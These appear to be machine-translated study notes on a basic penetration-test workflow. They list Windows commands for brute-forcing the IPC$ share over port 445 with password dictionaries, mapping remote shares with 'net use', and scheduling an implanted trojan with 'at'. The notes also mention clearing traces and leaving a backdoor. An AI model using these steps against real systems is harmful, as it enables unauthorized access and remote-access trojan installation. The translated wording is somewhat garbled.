Network Security Learning (x) simple test process of penetration

Simple penetration test process

1. information gathering

nslookup whois

2. Scan for leaks

namp=ip Range port 80（IIS,apache, What website ）

Advanced scanning ： Such as IIS Loophole 2003-IIS6.0 2008IIS7.0

Scanning for website vulnerabilities （）

3. Exploit

4. Raise the right （shell, Desktop Environment , Desktop Environment ）

5. Clean up traces

6. leave oneself a way out

7. Penetration test report

Probe

Generally, you can also use commands by using software

telnet ip Address Port number                  Detection port

445 Exploit And IPC$

Use command

net use                see

net use f: \\10.1.1.2\share password /user: user

net use f: /del

net use * /del

net use f: \\10.1.1.2\c$ password /user: user

net use \\10.1.1.2\ipc$ password /user: user         // Generally, only the password is unknown , So it is recommended to put your own computer                                                                                 The administrator name of has changed

  Brutally crack the system password 445

Use software NTpass, It will frequently enter the above command , Brute force code , Use default configuration

  Add user dictionary and password dictionary ,ntpass For the password dictionary ,ntuser For user dictionary

You can also use the dictionary generation tool to add dictionaries

Wait for the password to be cracked —— complete

ipc$ The role of ： Can control all shared folders of the other party and execute programs on the other party's computer

Make a Trojan

copy Implant Trojans

net time \\10.1.1.2

at \\10.1.1.2 Time " route "

Waiting for execution

The steps are

1.scanport Scan port 445

2.NTscan Crack the code

3. command net use \\10.1.1.2\ipc$ password /user: user

4. Use grey pigeons to make and implant Trojans